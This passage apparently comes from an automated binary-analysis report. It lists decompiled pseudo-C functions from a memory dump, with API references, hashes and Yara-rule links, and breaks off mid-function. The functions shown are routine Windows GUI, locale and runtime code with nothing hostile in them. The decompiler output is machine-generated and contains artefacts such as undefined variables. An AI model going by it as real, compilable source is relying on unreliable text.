Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: PointsWindow
String ID: <<C
API String ID: 4123100037-1310108723
Opcode ID: 0d24ce9bbe9451f139d5006053f2b3907b376103ea18818fd4cd6e1287589c2f
Instruction ID: d3f814b52d3f3b5c362c96177e8c950607e642efbd92538d2f2fe142554e6a2e
Opcode Fuzzy Hash: 0d24ce9bbe9451f139d5006053f2b3907b376103ea18818fd4cd6e1287589c2f
Instruction Fuzzy Hash: A8517075E002499FCB00DF69C881AEEF7F5AF49300F14916AEC14AB391C7B8AD09CB65

Uniqueness

Uniqueness Score: -1.00%

Function 00409C78, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148
threadCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00409C78(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				void* _t41;
				signed int _t45;
				signed int _t47;
				signed int _t49;
				signed int _t51;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				signed int _t83;
				signed int _t92;
				intOrPtr _t111;
				void* _t122;
				void* _t124;
				intOrPtr _t127;
				void* _t128;

				_t128 = __eflags;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_t122 = __edx;
				_t124 = __eax;
				_push(_t127);
				_push(0x409e42);
				_push( *[fs:eax]);
				 *[fs:eax] = _t127;
				_t92 = 1;
				E00404320(__edx);
				E00409940(GetThreadLocale(), 0x409e58, 0x1009,  &_v12);
				if(E00408740(0x409e58, 1, _t128) + 0xfffffffd - 3 < 0) {
					while(1) {
						_t41 = E004045D8(_t124);
						__eflags = _t92 - _t41;
						if(_t92 > _t41) {
							goto L28;
						}
						__eflags =  *(_t124 + _t92 - 1) & 0x000000ff;
						asm("bt [0x4710c0], eax");
						if(( *(_t124 + _t92 - 1) & 0x000000ff) >= 0) {
							_t45 = E00408CB8(_t124 + _t92 - 1, 2, 0x409e5c);
							__eflags = _t45;
							if(_t45 != 0) {
								_t47 = E00408CB8(_t124 + _t92 - 1, 4, 0x409e6c);
								__eflags = _t47;
								if(_t47 != 0) {
									_t49 = E00408CB8(_t124 + _t92 - 1, 2, 0x409e84);
									__eflags = _t49;
									if(_t49 != 0) {
										_t51 =  *(_t124 + _t92 - 1) - 0x59;
										__eflags = _t51;
										if(_t51 == 0) {
											L24:
											E004045E0(_t122, 0x409e9c);
										} else {
											__eflags = _t51 != 0x20;
											if(_t51 != 0x20) {
												E00404500();
												E004045E0(_t122, _v24);
											} else {
												goto L24;
											}
										}
									} else {
										E004045E0(_t122, 0x409e90);
										_t92 = _t92 + 1;
									}
								} else {
									E004045E0(_t122, 0x409e7c);
									_t92 = _t92 + 3;
								}
							} else {
								E004045E0(_t122, 0x409e68);
								_t92 = _t92 + 1;
							}
							_t92 = _t92 + 1;
							__eflags = _t92;
						} else {
							_v8 = E0040A9C0(_t124, _t92);
							E00404830(_t124, _v8, _t92,  &_v20);
							E004045E0(_t122, _v20);
							_t92 = _t92 + _v8;
						}
					}
				} else {
					_t75 =  *0x48f7f4; // 0x9
					_t76 = _t75 - 4;
					if(_t76 == 0 || _t76 + 0xfffffff3 - 2 < 0) {
						_t77 = 1;
					} else {
						_t77 = 0;
					}
					if(_t77 == 0) {
						E00404374(_t122, _t124);
					} else {
						while(_t92 <= E004045D8(_t124)) {
							_t83 =  *(_t124 + _t92 - 1) - 0x47;
							__eflags = _t83;
							if(_t83 != 0) {
								__eflags = _t83 != 0x20;
								if(_t83 != 0x20) {
									E00404500();
									E004045E0(_t122, _v16);
								}
							}
							_t92 = _t92 + 1;
							__eflags = _t92;
						}
					}
				}
				L28:
				_pop(_t111);
				 *[fs:eax] = _t111;
				_push(E00409E49);
				return E00404344( &_v24, 4);
			}

0x00409c78
0x00409c7d
0x00409c7e
0x00409c7f
0x00409c80
0x00409c81
0x00409c85
0x00409c87
0x00409c8b
0x00409c8c
0x00409c91
0x00409c94
0x00409c97
0x00409c9e
0x00409cb6
0x00409cce
0x00409e18
0x00409e1a
0x00409e1f
0x00409e21
0x00000000
0x00000000
0x00409d37
0x00409d3c
0x00409d43
0x00409d81
0x00409d86
0x00409d88
0x00409da7
0x00409dac
0x00409dae
0x00409dcf
0x00409dd4
0x00409dd6
0x00409deb
0x00409deb
0x00409ded
0x00409df3
0x00409dfa
0x00409def
0x00409def
0x00409df1
0x00409e08
0x00409e12
0x00000000
0x00000000
0x00000000
0x00409df1
0x00409dd8
0x00409ddf
0x00409de4
0x00409de4
0x00409db0
0x00409db7
0x00409dbc
0x00409dbc
0x00409d8a
0x00409d91
0x00409d96
0x00409d96
0x00409e17
0x00409e17
0x00409d45
0x00409d4e
0x00409d5c
0x00409d66
0x00409d6b
0x00409d6b
0x00409d43
0x00409cd4
0x00409cd4
0x00409cd9
0x00409cdc
0x00409cea
0x00409ce6
0x00409ce6
0x00409ce6
0x00409cee
0x00409d29
0x00409cf0
0x00409d15
0x00409cf6
0x00409cf6
0x00409cf8
0x00409cfa
0x00409cfc
0x00409d05
0x00409d0f
0x00409d0f
0x00409cfc
0x00409d14
0x00409d14
0x00409d14
0x00409d20
0x00409cee
0x00409e27
0x00409e29
0x00409e2c
0x00409e2f
0x00409e41

APIs

GetThreadLocale.KERNEL32(?,00000000,00409E42,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 00409CA7

Part of subcall function 00409940: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040995E

Strings

eeee, xrefs: 00409DB2
yyyy, xrefs: 00409D99
ggg, xrefs: 00409D8C

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: Locale$InfoThread
String ID: eeee$ggg$yyyy
API String ID: 4232894706-1253427255
Opcode ID: e740448f7b23abf1e202922b0e8a28a7b5816c4c0106e9600074a1662399f449
Instruction ID: b1cc0a42b2b977963f09e3c4df03bea2d22e2a3ff2346005cc6a014a45f458e2
Opcode Fuzzy Hash: e740448f7b23abf1e202922b0e8a28a7b5816c4c0106e9600074a1662399f449
Instruction Fuzzy Hash: 5341E5797041055BD715EA66D8816BFB295DFC4308B60443BE681B37C7EB3C9D0282AE

Uniqueness

Uniqueness Score: -1.00%

Function 0043EF68, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 83
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0043EF68(void* __eax, intOrPtr __ecx, intOrPtr __edx) {
				char _t23;
				struct HWND__* _t42;
				void* _t43;
				intOrPtr _t47;
				void* _t54;
				void* _t56;
				void* _t57;
				void* _t58;
				intOrPtr* _t59;

				 *((intOrPtr*)(_t59 + 4)) = __ecx;
				 *_t59 = __edx;
				_t54 = __eax;
				_t42 =  *(__eax + 0x180);
				if(_t42 == 0 || IsWindowVisible(_t42) == 0) {
					_t23 = 0;
				} else {
					_t23 = 1;
				}
				 *((char*)(_t59 + 8)) = _t23;
				if( *((char*)(_t59 + 8)) != 0) {
					ScrollWindow( *(_t54 + 0x180),  *(_t59 + 0xc),  *(_t59 + 0xc), 0, 0);
				}
				_t56 = E0043C1F8(_t54) - 1;
				if(_t56 < 0) {
					L14:
					return E0043BD88();
				} else {
					_t57 = _t56 + 1;
					_t58 = 0;
					do {
						_t43 = E0043C1BC(_t54, _t58);
						_t47 =  *0x434e14; // 0x434e60
						if(E00403740(_t43, _t47) == 0 ||  *(_t43 + 0x180) == 0) {
							 *((intOrPtr*)(_t43 + 0x40)) =  *((intOrPtr*)(_t43 + 0x40)) +  *_t59;
							 *((intOrPtr*)(_t43 + 0x44)) =  *((intOrPtr*)(_t43 + 0x44)) +  *((intOrPtr*)(_t59 + 4));
						} else {
							if( *((char*)(_t59 + 8)) == 0) {
								SetWindowPos( *(_t43 + 0x180), 0,  *((intOrPtr*)(_t43 + 0x40)) +  *((intOrPtr*)(_t59 + 0x10)),  *((intOrPtr*)(_t34 + 0x44)) +  *((intOrPtr*)(_t59 + 0x10)),  *(_t34 + 0x48),  *(_t34 + 0x4c), 0x14);
							}
						}
						_t58 = _t58 + 1;
						_t57 = _t57 - 1;
					} while (_t57 != 0);
					goto L14;
				}
			}

0x0043ef6f
0x0043ef73
0x0043ef76
0x0043ef78
0x0043ef80
0x0043ef8c
0x0043ef90
0x0043ef90
0x0043ef90
0x0043ef92
0x0043ef9b
0x0043efb2
0x0043efb2
0x0043efc0
0x0043efc3
0x0043f031
0x0043f03f
0x0043efc5
0x0043efc5
0x0043efc6
0x0043efc8
0x0043efd1
0x0043efd5
0x0043efe2
0x0043eff0
0x0043eff7
0x0043effc
0x0043f001
0x0043f028
0x0043f028
0x0043f001
0x0043f02d
0x0043f02e
0x0043f02e
0x00000000
0x0043efc8

APIs

IsWindowVisible.USER32(?), ref: 0043EF83
ScrollWindow.USER32 ref: 0043EFB2
SetWindowPos.USER32(?,00000000,?,?,?,?,00000014), ref: 0043F028

Strings

`NC, xrefs: 0043EFD5

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$ScrollVisible
String ID: `NC
API String ID: 4127837035-918118547
Opcode ID: 470d5b4f620aea773379c3c5e608396b2e8a9281d87429e663caf6d465da83a5
Instruction ID: 74fcff1920f98a81aa1ba1a1336476b2713305271cd95b240de63e703cda033f
Opcode Fuzzy Hash: 470d5b4f620aea773379c3c5e608396b2e8a9281d87429e663caf6d465da83a5
Instruction Fuzzy Hash: B5219F71605200BFC710DA5EC880B6BB7E4AF8C714F14956EF658CB392D779EC05876A

Uniqueness

Uniqueness Score: -1.00%

Function 00424C48, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E00424C48(intOrPtr __eax, void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, intOrPtr _a4, char _a8, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t62;
				intOrPtr _t64;
				intOrPtr _t67;
				void* _t77;
				void* _t78;
				intOrPtr _t79;
				intOrPtr _t80;

				_t77 = _t78;
				_t79 = _t78 + 0xfffffff8;
				_v8 = __eax;
				_v12 = E00403584(1);
				_push(_t77);
				_push(0x424ccf);
				_push( *[fs:eax]);
				 *[fs:eax] = _t79;
				 *((intOrPtr*)(_v12 + 8)) = __edx;
				 *((intOrPtr*)(_v12 + 0x10)) = __ecx;
				memcpy(_v12 + 0x18, _a12, 0x15 << 2);
				_t80 = _t79 + 0xc;
				 *((char*)(_v12 + 0x70)) = _a8;
				if( *((intOrPtr*)(_v12 + 0x2c)) != 0) {
					 *((intOrPtr*)(_v12 + 0x14)) =  *((intOrPtr*)(_v12 + 8));
				}
				_t62 =  *0x412210; // 0x41225c
				 *((intOrPtr*)(_v12 + 0x6c)) = E00403764(_a4, _t62);
				_pop(_t64);
				 *[fs:eax] = _t64;
				_push(0x48fa44);
				L00406840();
				_push(_t77);
				_push(0x424d2f);
				_push( *[fs:edx]);
				 *[fs:edx] = _t80;
				E0042367C( *((intOrPtr*)(_v8 + 0x28)));
				 *((intOrPtr*)(_v8 + 0x28)) = _v12;
				E00423678(_v12);
				_pop(_t67);
				 *[fs:eax] = _t67;
				_push(0x424d36);
				_push(0x48fa44);
				L00406990();
				return 0;
			}

0x00424c49
0x00424c4b
0x00424c55
0x00424c64
0x00424c69
0x00424c6a
0x00424c6f
0x00424c72
0x00424c78
0x00424c7e
0x00424c91
0x00424c91
0x00424c99
0x00424ca3
0x00424cae
0x00424cae
0x00424cb4
0x00424cc2
0x00424cc7
0x00424cca
0x00424ce6
0x00424ceb
0x00424cf2
0x00424cf3
0x00424cf8
0x00424cfb
0x00424d04
0x00424d0f
0x00424d12
0x00424d19
0x00424d1c
0x00424d1f
0x00424d24
0x00424d29
0x00424d2e

APIs

RtlEnterCriticalSection.KERNEL32(0048FA44,00000000,?,?), ref: 00424CEB
RtlLeaveCriticalSection.KERNEL32(0048FA44,00424D36,0048FA44,00000000,?,?), ref: 00424D29

Strings

LA, xrefs: 00424C5A
\"A, xrefs: 00424CB4

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$EnterLeave
String ID: LA$\"A
API String ID: 3168844106-2100970992
Opcode ID: e31419e8f99c5b5e35767a0b1d708b11f7f69802d26a11b41ed14e46dd6906ae
Instruction ID: 3fe710d31c7b0d7ffea7adcd7f6d7e37885143c0d0e6751d88494af2f7d13176
Opcode Fuzzy Hash: e31419e8f99c5b5e35767a0b1d708b11f7f69802d26a11b41ed14e46dd6906ae
Instruction Fuzzy Hash: 8B217F74B04304AFC711DF69D881989BBF5FB88720B5185AAEC04A7761C778AE40CA54

Uniqueness

Uniqueness Score: -1.00%

Function 0044C174, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58
windowCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E0044C174(intOrPtr* __eax) {
				struct tagMENUITEMINFOA _v128;
				intOrPtr _v132;
				int _t16;
				intOrPtr* _t29;
				struct HMENU__* _t36;
				MENUITEMINFOA* _t37;

				_t37 =  &_v128;
				_t29 = __eax;
				_t16 =  *0x48e85c; // 0x48f7f0
				if( *((char*)(_t16 + 0xd)) != 0 &&  *((intOrPtr*)(__eax + 0x38)) != 0) {
					_t36 =  *((intOrPtr*)( *__eax + 0x34))();
					_t37->cbSize = 0x2c;
					_v132 = 0x10;
					_v128.hbmpUnchecked =  &(_v128.cch);
					_v128.dwItemData = 0x50;
					_t16 = GetMenuItemInfoA(_t36, 0, 0xffffffff, _t37);
					if(_t16 != 0) {
						_t16 = E0044C4F8(_t29);
						asm("sbb edx, edx");
						if(_t16 != (_v128.cbSize & 0x00006000) + 1) {
							_v128.cbSize = ((E0044C4F8(_t29) & 0x0000007f) << 0x0000000d) + ((E0044C4F8(_t29) & 0x0000007f) << 0x0000000d) * 0x00000002 | _v128 & 0xffff9fff;
							_v132 = 0x10;
							_t16 = SetMenuItemInfoA(_t36, 0, 0xffffffff, _t37);
							if(_t16 != 0) {
								return DrawMenuBar( *(_t29 + 0x38));
							}
						}
					}
				}
				return _t16;
			}

0x0044c176
0x0044c179
0x0044c17b
0x0044c184
0x0044c19b
0x0044c19d
0x0044c1a4
0x0044c1b0
0x0044c1b4
0x0044c1c2
0x0044c1c9
0x0044c1cd
0x0044c1df
0x0044c1e4
0x0044c202
0x0044c206
0x0044c214
0x0044c21b
0x00000000
0x0044c221
0x0044c21b
0x0044c1e4
0x0044c1c9
0x0044c22e

APIs

GetMenuItemInfoA.USER32 ref: 0044C1C2
SetMenuItemInfoA.USER32(00000000,00000000,000000FF), ref: 0044C214
DrawMenuBar.USER32(00000000,00000000,00000000,000000FF), ref: 0044C221

Strings

P, xrefs: 0044C1B4

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: Menu$InfoItem$Draw
String ID: P
API String ID: 3227129158-3110715001
Opcode ID: db82e1dc4962256e1fc868099e69b0e40600b07c7c584f5733a1cdeb67d3eb79
Instruction ID: b11324016f07151bbb3df529ce18a1cfba02fc941874fdd1eeb36abafcf49ae8
Opcode Fuzzy Hash: db82e1dc4962256e1fc868099e69b0e40600b07c7c584f5733a1cdeb67d3eb79
Instruction Fuzzy Hash: DC1104316062006FE350DB28DCC1B5B76D4AF85364F188A69F054DB3D5D7B8D944C74E

Uniqueness

Uniqueness Score: -1.00%

Function 004263D8, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E004263D8(void* __ebx, void* __ecx, void* __edx) {
				intOrPtr _t3;
				intOrPtr _t5;
				intOrPtr _t7;
				intOrPtr _t10;
				intOrPtr _t12;
				intOrPtr _t14;
				intOrPtr _t16;
				intOrPtr _t18;
				void* _t20;
				void* _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				intOrPtr _t35;
				intOrPtr _t38;

				_t27 = __ecx;
				_push(_t38);
				_push(0x4264a1);
				_push( *[fs:eax]);
				 *[fs:eax] = _t38;
				 *0x48fa2c =  *0x48fa2c + 1;
				if( *0x48fa2c == 0) {
					_t3 =  *0x48fa84; // 0x2130b50
					E004035B4(_t3);
					_t5 =  *0x471784; // 0x0
					E004035B4(_t5);
					_t7 =  *0x471780; // 0x0
					E004035B4(_t7);
					E0042335C(__ebx, _t27);
					_t10 =  *0x471788; // 0x2130b74
					E004035B4(_t10);
					_t12 =  *0x48fa80; // 0x2130bb0
					E004035B4(_t12);
					_t14 =  *0x48fa74; // 0x2130ad8
					E004035B4(_t14);
					_t16 =  *0x48fa78; // 0x2130b00
					E004035B4(_t16);
					_t18 =  *0x48fa7c; // 0x2130b28
					E004035B4(_t18);
					_t20 =  *0x48fa28; // 0xab0806ee
					DeleteObject(_t20);
					_push(0x48fa44);
					L00406838();
					_push(0x48fa5c);
					L00406838();
					_t34 =  *0x412a64; // 0x412a68
					E00404E00(0x4716a0, 0x12, _t34);
					_t35 =  *0x412a64; // 0x412a68
					E00404E00(0x471518, 0x31, _t35);
				}
				_pop(_t33);
				 *[fs:eax] = _t33;
				_push(0x4264a8);
				return 0;
			}

0x004263d8
0x004263dd
0x004263de
0x004263e3
0x004263e6
0x004263e9
0x004263ef
0x004263f5
0x004263fa
0x004263ff
0x00426404
0x00426409
0x0042640e
0x00426413
0x00426418
0x0042641d
0x00426422
0x00426427
0x0042642c
0x00426431
0x00426436
0x0042643b
0x00426440
0x00426445
0x0042644a
0x00426450
0x00426455
0x0042645a
0x0042645f
0x00426464
0x00426473
0x00426479
0x00426488
0x0042648e
0x0042648e
0x00426495
0x00426498
0x0042649b
0x004264a0

APIs

DeleteObject.GDI32(AB0806EE), ref: 00426450
RtlDeleteCriticalSection.KERNEL32(0048FA44,AB0806EE,00000000,004264A1), ref: 0042645A
RtlDeleteCriticalSection.KERNEL32(0048FA5C,0048FA44,AB0806EE,00000000,004264A1), ref: 00426464

Strings

h*A, xrefs: 00426473, 00426488

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: Delete$CriticalSection$Object
String ID: h*A
API String ID: 378701848-3610640036
Opcode ID: b290ab754b42c8e6b854fdbbe2cfa56a8dda54a36e490d74d5baecaae7aa22c0
Instruction ID: c13c9e4776f7addb0c49aa7fd2e29796781a16e19696e54c606d4d268705ee95
Opcode Fuzzy Hash: b290ab754b42c8e6b854fdbbe2cfa56a8dda54a36e490d74d5baecaae7aa22c0
Instruction Fuzzy Hash: BC010C70300140ABC729FF6AEC5391D7769E744719391887BB405A7AB2CA7CAD188B9C

Uniqueness

Uniqueness Score: -1.00%

Function 00426C3C, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E00426C3C(intOrPtr _a4, intOrPtr _a8, signed int _a12) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t15;
				void* _t16;
				intOrPtr _t18;
				signed int _t19;
				void* _t20;
				intOrPtr _t21;

				_t19 = _a12;
				if( *0x48fabf != 0) {
					_t16 = 0;
					if((_t19 & 0x00000003) != 0) {
						L7:
						_t16 = 0x12340042;
					} else {
						_t21 = _a4;
						if(_t21 >= 0 && _t21 < GetSystemMetrics(0) && _a8 >= 0 && GetSystemMetrics(1) > _a8) {
							goto L7;
						}
					}
				} else {
					_t18 =  *0x48faa0; // 0x426c3c
					 *0x48faa0 = E004269A4(3, _t15, _t18, _t19, _t20);
					_t16 =  *0x48faa0(_a4, _a8, _t19);
				}
				return _t16;
			}

0x00426c42
0x00426c4c
0x00426c76
0x00426c7f
0x00426ca7
0x00426ca7
0x00426c81
0x00426c81
0x00426c86
0x00000000
0x00000000
0x00426c86
0x00426c4e
0x00426c53
0x00426c60
0x00426c72
0x00426c72
0x00426cb2

APIs

GetSystemMetrics.USER32 ref: 00426C8A
GetSystemMetrics.USER32 ref: 00426C9C

Part of subcall function 004269A4: GetProcAddress.KERNEL32(74EA0000,00000000), ref: 00426A24

Strings

MonitorFromPoint, xrefs: 00426C4E
<lB, xrefs: 00426C53, 00426C60, 00426C6C

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: MetricsSystem$AddressProc
String ID: <lB$MonitorFromPoint
API String ID: 1792783759-2621410050
Opcode ID: db883e686d35021d78765277dda61c9650f74f4c625b5aaa7a89ccad8a76b3d2
Instruction ID: e4eae37c7e228267eb39a01812482bd2883d4e3322c9c4e0897d860edaf3a9f7
Opcode Fuzzy Hash: db883e686d35021d78765277dda61c9650f74f4c625b5aaa7a89ccad8a76b3d2
Instruction Fuzzy Hash: 1901A231300224EFDF046F53EC84B5E7B55EB80764F81843AF9998B611C3759C49C768

Uniqueness

Uniqueness Score: -1.00%

Function 0040B3B8, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040B3B8() {
				_Unknown_base(*)()* _t1;
				struct HINSTANCE__* _t3;

				_t1 = GetModuleHandleA("kernel32.dll");
				_t3 = _t1;
				if(_t3 != 0) {
					_t1 = GetProcAddress(_t3, "GetDiskFreeSpaceExA");
					 *0x4710e4 = _t1;
				}
				if( *0x4710e4 == 0) {
					 *0x4710e4 = E00408B04;
					return E00408B04;
				}
				return _t1;
			}

0x0040b3be
0x0040b3c3
0x0040b3c7
0x0040b3cf
0x0040b3d4
0x0040b3d4
0x0040b3e0
0x0040b3e7
0x00000000
0x0040b3e7
0x0040b3ed

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,?,0040C091,00000000,0040C0A4), ref: 0040B3BE
GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 0040B3CF

Strings

GetDiskFreeSpaceExA, xrefs: 0040B3C9
kernel32.dll, xrefs: 0040B3B9

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProc
String ID: GetDiskFreeSpaceExA$kernel32.dll
API String ID: 1646373207-3712701948
Opcode ID: eb26b233bb6f3c4152a4dbd87045aa75ab81a46f43b9481ac3ee18b98649a16b
Instruction ID: 293807534f544a3f550c89d77f40ca4b3b3a12431bdd46a8951dee4c4cae3754
Opcode Fuzzy Hash: eb26b233bb6f3c4152a4dbd87045aa75ab81a46f43b9481ac3ee18b98649a16b
Instruction Fuzzy Hash: A5D09EB16023C55AD710FBFA6DC179A3158D710318B20903BB606F56E3D7BC88D8969C

Uniqueness

Uniqueness Score: -1.00%

Function 00466CD4, Relevance: 6.2, APIs: 4, Instructions: 225
windowCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00466CD4(char __eax, intOrPtr __ecx, void* __edx, void* _a8) {
				char _v8;
				intOrPtr _v12;
				struct tagRECT _v28;
				intOrPtr _v32;
				struct HWND__* _v36;
				signed short _v38;
				char _v39;
				char _v40;
				signed int _v52;
				void* __edi;
				void* __ebp;
				void* _t93;
				struct HWND__* _t94;
				signed int _t99;
				signed int _t100;
				signed int _t123;
				struct HWND__* _t125;
				signed int _t127;
				signed int _t129;
				void* _t131;
				struct HWND__* _t144;
				struct HWND__* _t145;
				intOrPtr _t148;
				void* _t152;
				struct HWND__* _t153;
				intOrPtr _t155;
				intOrPtr _t159;
				struct HWND__* _t196;
				struct HWND__* _t200;
				long _t209;
				struct HWND__** _t212;
				void* _t213;

				_t180 = __ecx;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v32 = __ecx;
				_v8 = __eax;
				_t212 =  &_v8;
				_t93 = E00464468( *((intOrPtr*)( *_t212 + 0x29c)));
				_t214 =  *((intOrPtr*)(_t93 + 8));
				if( *((intOrPtr*)(_t93 + 8)) == 0) {
					E0041F7B8( *((intOrPtr*)( *((intOrPtr*)( *_t212 + 0x208)) + 0x14)), __ecx,  *((intOrPtr*)( *_t212 + 0x70)),  &_v28, _t213, _t214);
					return E0041FE50( *((intOrPtr*)( *_t212 + 0x208)),  &_v28);
				}
				_t94 =  *_t212;
				__eflags =  *((char*)(_t94 + 0x2e8)) - 1;
				if( *((char*)(_t94 + 0x2e8)) != 1) {
					L10:
					_t209 = _v28.left;
					_v36 = E0046683C( *_t212, _v32);
					_t99 = _v28.bottom - _v28.top -  *((intOrPtr*)( *_t212 + 0x2b0));
					__eflags = _t99;
					_t100 = _t99 >> 1;
					if(__eflags < 0) {
						asm("adc eax, 0x0");
					}
					_v52 = _t100;
					_t173 =  *((intOrPtr*)( *_t212 + 0x208));
					E00420140( *((intOrPtr*)( *_t212 + 0x208)));
					E0041F7B8( *((intOrPtr*)( *((intOrPtr*)( *_t212 + 0x208)) + 0x14)), _t180,  *((intOrPtr*)( *_t212 + 0x70)), _t209, _t213, __eflags);
					E0041FE50( *((intOrPtr*)( *_t212 + 0x208)),  &_v28);
					_v12 = E00420080(_t173,  *((intOrPtr*)(_v36 + 8))) + 1;
					__eflags =  *( *_t212 + 0x22c) - _v32;
					if(__eflags == 0) {
						E0041F7B8( *((intOrPtr*)(_t173 + 0x14)), _t180, 0x8000000d, _t209, _t213, __eflags);
						E0041EFCC( *((intOrPtr*)(_t173 + 0xc)), 0x8000000e);
					}
					_v40 =  *((intOrPtr*)(_v36 + 0x18));
					_v39 = E00464E40(_v36);
					_v38 = E00464554(_v36);
					_t123 =  *( *_t212 + 0x2e0) & 0x000000ff;
					__eflags = _t123 - 5;
					if(__eflags > 0) {
						L22:
						_t125 =  *( *_t212 + 0x22c);
						__eflags = _t125 - _v32;
						if(_t125 != _v32) {
							goto L35;
						}
						_t125 = _v36;
						__eflags =  *(_t125 + 8);
						if( *(_t125 + 8) == 0) {
							goto L35;
						}
						_t127 =  *( *_t212 + 0x234);
						_v28.left = _t209 + _t127 * ((_v38 & 0x0000ffff) - 1);
